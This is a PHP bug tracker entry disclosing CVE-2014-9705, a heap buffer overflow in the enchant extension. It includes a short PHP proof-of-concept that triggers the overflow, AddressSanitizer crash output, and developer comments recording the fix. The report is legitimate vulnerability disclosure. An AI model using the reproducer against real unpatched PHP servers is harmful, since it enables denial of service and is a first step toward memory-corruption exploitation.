PHP :: Sec Bug #68552 :: heap buffer overflow in enchant_broker_request

Sec Bug #68552	heap buffer overflow in enchant_broker_request_dict()
Submitted:	2014-12-05 13:15 UTC	Modified:	2015-03-18 12:11 UTC
From:	advisory at htbridge dot ch	Assigned:	tony2001 (profile)
Status:	Closed	Package:	Reproducible crash
PHP Version:	5.6.3	OS:	Ubuntu 14.04.1 LTS 32bit
Private report:	No	CVE-ID:	2014-9705

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	advisory at htbridge dot ch
New email:
PHP Version:		OS:

New Comment:

[2014-12-05 13:15 UTC] advisory at htbridge dot ch

Description:
------------
The following test case crashes php as it tries to read invalid memory.

The write heap overflow from ASAN is not always reproducible - you need to run the test case a couple of times to get it.

Affects also 64-bit systems.

PoC
========

<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>


Result:
========
[Fri Dec  5 13:32:59 2014]  Script:  '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
    Start:  OK
      End:  Overflown (magic=0x00000034 instead of 0xAF9A0F68)
            At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
    #2 0xb616ef1e in ?? ??:0
    #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
    #4 0xb6184b7f in __asan_report_error ??:?
    #5 0xb617db2e in __asan_report_store4 ??:?
    #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287


Regards,
S. Paraschoudis

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2014-12-19 09:27 UTC] advisory at htbridge dot ch

Did anyone have time to review and confirm the issue?

[2015-01-26 10:19 UTC] advisory at htbridge dot ch

Friendly reminder, can someone please review it?
Thank you.

[2015-01-26 11:50 UTC] tony2001@php.net

-Status: Open +Status: Closed -Assigned To: +Assigned To: tony2001

[2015-01-26 11:50 UTC] tony2001@php.net

The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Pushed a fix to SVN, thanks!
http://svn.php.net/viewvc/pecl/enchant/trunk/enchant.c?r1=317600&r2=335803

[2015-03-18 12:11 UTC] kaplan@php.net

-CVE-ID: +CVE-ID: 2014-9705

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Sat Nov 23 07:01:29 2024 UTC